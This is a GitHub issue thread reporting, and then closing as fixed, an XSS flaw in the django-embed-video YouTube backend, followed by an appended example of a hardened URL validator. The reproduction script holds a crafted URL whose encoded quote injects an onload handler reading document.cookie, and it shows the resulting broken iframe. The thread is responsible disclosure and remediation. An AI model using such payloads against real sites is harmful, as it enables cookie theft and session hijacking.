jazzband / django-embed-video

Django app for easy embedding YouTube and Vimeo videos and music from SoundCloud.
http://django-embed-video.rtfd.org
MIT License

XSS possible in YoutubeBackend with user-provided URL #182

Closed Remiz closed 1 year ago

Remiz commented 1 year ago

Hi,

I think I've noticed a possible XSS using this package when users are allowed to provide URLs. Here is the code I've used to reproduce the issue:

# Assumes a configured Django environment (e.g. manage.py shell), since get_embed_code renders a Django template.
from embed_video.backends import detect_backend

# User-controlled URL carrying a percent-encoded double quote and an onload attribute.
url = 'https://www.youtube.com/watch?v=\asa\C0DPdy98e4c?wmode=opa\queenablejsapi=1origin=https%3A%2F%2Fwww.aa%22aaaa.com onload=%22javascript:alert(document.cookie)%22'
video = detect_backend(url)
video.is_secure = True
print(video.get_embed_code(800, 400))

And here is the result of the embedded code:

<iframe width="800" height="400" src="https://www.youtube.com/embed/sa\C0DPdy98e4c?wmode=opa\queenablejsapi=1origin=https://www.aa"aaaa.com onload="javascript:alert(document.cookie)"?wmode=opaque" loading="lazy" frameborder="0" allowfullscreen></iframe>

It looks like the URL-encoded double quotes are decoded by urlparse.parse_qs somehow.

aleksihakli commented 1 year ago

Hi and thanks for catching this.

The URL needs to be validated and sanitized. Would anyone happen to have ideas and time for improving the security?

aleksihakli commented 1 year ago

Fixed by #187
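The report above shows the root cause (parse_qs percent-decodes the query value, and the decoded text is copied into the iframe's src attribute unescaped), and the maintainer's reply asks for validation and sanitization. The following is an added example of what that looks like, not django-embed-video's own code and not the fix in #187: a hypothetical extractor that validates the video id strictly after decoding and escapes the attribute on output, so the reported URL is refused instead of rendered.

```python
import html
import re
from urllib.parse import parse_qs, urlparse

# Hypothetical hardened extractor, not django-embed-video's own code. A YouTube video
# id is exactly 11 characters from [A-Za-z0-9_-]; anything else is refused outright.
YOUTUBE_ID_RE = re.compile(r"[A-Za-z0-9_-]{11}")

# The URL from the report above, as a raw string so the backslashes stay literal.
REPORTED_URL = (
    r"https://www.youtube.com/watch?v=\asa\C0DPdy98e4c?wmode=opa\queenablejsapi=1"
    r"origin=https%3A%2F%2Fwww.aa%22aaaa.com onload=%22javascript:alert(document.cookie)%22"
)


class InvalidVideoURL(ValueError):
    """The URL does not carry a well-formed YouTube video id."""


def extract_youtube_id(url: str) -> str:
    """Return the validated video id from a watch?v= or youtu.be URL."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if host in ("www.youtube.com", "youtube.com", "m.youtube.com"):
        # parse_qs percent-decodes values (%22 becomes '"'), which is where the
        # reported quote came from; validating after decoding catches it.
        candidate = parse_qs(parsed.query).get("v", [""])[0]
    elif host == "youtu.be":
        candidate = parsed.path.lstrip("/")
    else:
        raise InvalidVideoURL(f"unsupported host: {host!r}")
    if not YOUTUBE_ID_RE.fullmatch(candidate):
        raise InvalidVideoURL(f"malformed video id: {candidate!r}")
    return candidate


def is_safe_youtube_url(url: str) -> bool:
    try:
        extract_youtube_id(url)
        return True
    except InvalidVideoURL:
        return False


def youtube_embed(url: str, width: int, height: int) -> str:
    """Build the iframe from the validated id only, never from the raw URL."""
    src = f"https://www.youtube.com/embed/{extract_youtube_id(url)}?wmode=opaque"
    # Attribute escaping is the second layer: even if validation were loosened
    # later, a quote could not close the src attribute.
    return (f'<iframe width="{int(width)}" height="{int(height)}" '
            f'src="{html.escape(src, quote=True)}" loading="lazy" '
            f'frameborder="0" allowfullscreen></iframe>')
```

Because the id is validated after parse_qs has decoded it, the same check also rejects a minimal variant such as a v parameter ending in %22, and a plain watch?v= or youtu.be URL still produces the normal iframe.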